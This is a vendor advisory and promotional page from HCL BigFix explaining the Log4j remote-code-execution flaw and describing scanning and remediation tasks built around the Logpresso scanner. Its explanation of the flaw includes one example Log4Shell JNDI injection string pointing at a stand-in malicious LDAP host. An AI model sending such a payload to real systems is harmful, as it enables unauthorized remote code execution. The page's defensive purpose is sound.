01

Nearly every global enterprise or organization is facing pressure to fix what experts are calling one of the most serious software vulnerabilties in recent memory. It’s broadbased and easy to exploit.

02

The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the U.S. government’s cybersecurity agency.

03

Attacks have already taken place less than a day after its reporting. Currently, this vulnerability holds a risk matrix base score of 10 and has been labelled by GitHub advisory as a critical severity level.

Log4j is everywhere. Apache Log4j is a popular Java library developed and maintained by the Apache foundation. The Log4j library is widely adopted and used in many commercial and open-source software products as a logging framework for Java. It is estimated that hundreds of millions of devices are at risk, and may include government and commercial devices as well as home consumer devices, as Apache Log4j is in ubiquitous use across the computing ecosystem of the world. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing. Why is it so serious?

The Log4j vulnerability is critical because it can be exploited remotely by an unauthenticated adversary to execute arbitrary code (referred to as remote code execution: RCE). The criticality of the vulnerability has a score of 10/10 in the MITRE.org common vulnerability scoring system (CVSS) which indicates how severe the vulnerability is. The RCE vulnerability can be exploited based on how log messages are handled by the log4j code. If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}), this may result in loading an external code class or message lookup and the execution of that external (malicious) code, will lead to a RCE where the threat actor can arbitrarily execute malicious code WITHOUT authentication.

In summary, this is a massive vulnerability that affects hundreds of millions of devices across the entire worldwide computing ecosystem and locating these vulnerable areas of code and remediating them is of utmost importance and urgency. Fortunately, BigFix is designed to help with exactly these kinds of scenarios.

We are working alongside our customers, security experts, and IT Operations to produce vulnerability identification and remediation content that will help you identify and fix the Log4j impacts in your environment.

The situation we are all facing is fluid and we are reacting in real-time to new variations of the vulnerabilities as they are announced as well a to keep the latest guidance to you, our customers, up to date and current. We constantly assess and consume the best guidance of Apache, security experts, and patches from software vendors, as well as crafting solutions that work with the BigFix product and tool suite.

When you use these solutions, it is incumbent on your organization to test any solutions provided across the broadest available system base including various OS, storage solutions, and application inventory. Realize that certain remediation steps may damage applications in your ecosystem based on what kind of mitigation is being deployed. Use caution, test in smaller, controlled environments, and be prepared to have a restoration plan in place if things go away.

   

Discover: How do I use BigFix to scan for the Log4j vulnerability?

The general scanning process is:

  • Download, Import, and Activate the Analysis to report the Log4j-scan results.
  • Download and import one or more of the Log4j-scan Tasks.
  • Execute the scans that are appropriate for your environment to collect results.

Which scans should I use?

We have currently developed five different scans, and six different Remediation Fixlets. All report results in the same way, and all generate the same outputs. Which ones should you use?

OS-Specific Binary Scans

These three scans download a prebuilt binary for a limited set of operating systems. These may have issues if you don’t have certain prerequisites installed, including Visual C++ Runtime on Windows, or specific glibc versions on Linux.

More recent versions of Logpressso Log4j-scan are “static- compiled” which reduces these compatibility issues but may not eliminate them entirely. If you need the smallest possible downloads, and your operating systems support these binary scans, feel free to use them. If you do encounter any compatibility issues, switch to one of the Java-based scans below.
>>Logpresso Scanner - Linux
>>Logpresso Scanner - Mac
>>Logpresso Scanner - Windows

Java-based scanner, with existing Java installation

If your systems already have Java installed, and it is at least JRE 7, you may use the “Universal Java” Scan. This provides the widest range of compatibility, able to handle many operating systems for which we have not created specific JRE downloads, such as 32-bit Linux, Solaris, AIX, and even Raspbian.
>>Logpresso Scanner - Universal

Java-based scanner, with a downloaded JRE

For systems that do not have Java installed, or the Java is too old to run Logpresso Log4j-scan, we have ongoing work on a Task that downloads a temporary Java Runtime to execute the scanner. Currently we provide downloads for 32-bit Windows, 64-bit Windows, 64-bit Linux and Mac. We will be focusing work on this over the next few days to add more Java runtimes. 32-bit Linux, AIX, Solaris, and HP-UX are intended.

HCL BigFix is currently recommending the free Logpresso scanner for targeted and deep interrogation of your software. What is Logpresso, why is BigFix leveraging it?

  • Logpresso is a cyber security and data analytics company based in South Korea.
  • The Logpresso Log4j scanner is an open-source java-based scanner, available on GitHub, developed by the Logpresso technical team, and made freely available to the cybersecurity community.

a. The Logpresso scanner can search not only in .jar files, but also in compressed archive files including .ear, .war files, which means a more complete scan result.

b. As a benefit to our customers, BigFix product team has created customized automation content for logpresso that amplifies its effectiveness at finding log4j instances in your application environment.

c. There’s no reason why you can’t use any other good scanner (e.g., one that you write yourself, ones available from other sources, etc.)

Remember that BigFix acts as a force-multiplier for Logpresso, or ANY other scanner or remediation code, by letting you scale scanning and remediation across tens of thousands of devices, multiple OSes, and disparate hardware.

REMEDIATE: How should I use BigFix to do remediations before patches are available from the application vendors?


BigFix has a set of Remediation tasks based on Logpresso Log4j-scan results. These are all use at your own risk. Test. It is difficult for us to predict which applications may be broken by any of these remediations in your setting. However, given the severity of these issues we felt it important to provide options while we all wait for patches from individual software vendors.

These are split into two categories:

Logpresso Log4j-scan remediation


The Logpresso Log4j-scan utility itself can perform some remediations. Specifically, it opens the log4j-core-2.x.jar file and removes the JndiLookup.class from the file, following the guidance as recommended at the Apache security page. This mitigates the worst of the CVEs but may not mitigate the more recent, denial-of-service based vulnerabilities. Still, this can be a very effective step to take to provide the most protection while maintaining the best backward-compatibility with existing applications.



For each of our Logpresso scans, we provide a Mitigation task:

Logpresso Remediation - Windows
Logpresso Remediation - Linux
Logpresso Remediation - Mac
Logpresso Remediation - Java - Universal
Logpresso Remediation - Java - With Temporary JRE

Log4j-core-2.17.0.jar replacement


Additionally, we provide a Task that, instead of modifying Log4j-core, will replace the Log4j-core- 2.x.jar file with the latest 2.17.0 version. This closes all of the known CVEs but could be more likely to introduce compatibility problems with the applications that depend on Log4j.

This task parses the output log of a previous Logpresso Log4j-scan task, and where possible replaces the Log4j-core-2.x.jar file.

When we replace the file, we keep the original version’s filename, which can help reduce compatibility problems. The original file is backed up so it can be restored later if necessary.


Limitations:

a. Does not descend within embedded JAR, WAR, EAR4 files. Only replaces the Log4j-core- 2.x.jar where it is directly accessible in the filesystem.


b. Does not replace Log4j 1.x versions. Log4j Mitigation - Replace Log4j with 2.17.02



Check for the Latest: Please review these sites for more information and check back frequently

Current summary page for BigFix response: ->


BigFix Inventory Update: ->


Using BigFix Inventory to find Log4J: ->


Blog: ->


Webinar: ->


Scan Task: ->


Analysis Results: ->


Knowledge base article: ->


Additional help is available at https://bigfix.me and at https://support.hcltechsw.com/.


Fixlets will also be available on an ongoing basis as your BigFix team continues to work on this around the clock.

IT Operations is essential to beating this. BigFix is the essential tool for IT Operations

BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. BigFix Insights for Vulnerability Remediation integrates with leading vulnerability management solutions like Tenable to remediate vulnerabilities like Log4j faster than any other solution in the market.

With BigFix, you can manage every endpoint, now and in the future.

BigFix has provided customers with specialized tools to help find log4j wherever it existed in their environment, including file systems, across nearly 100 operating system variants.

Try BigFix Today!

One endpoint management platform enabling IT Operations and Security teams to automate discovery, management and remediation – whether its on-premise, virtual, or cloud – regardless of operating system, location or connectivity.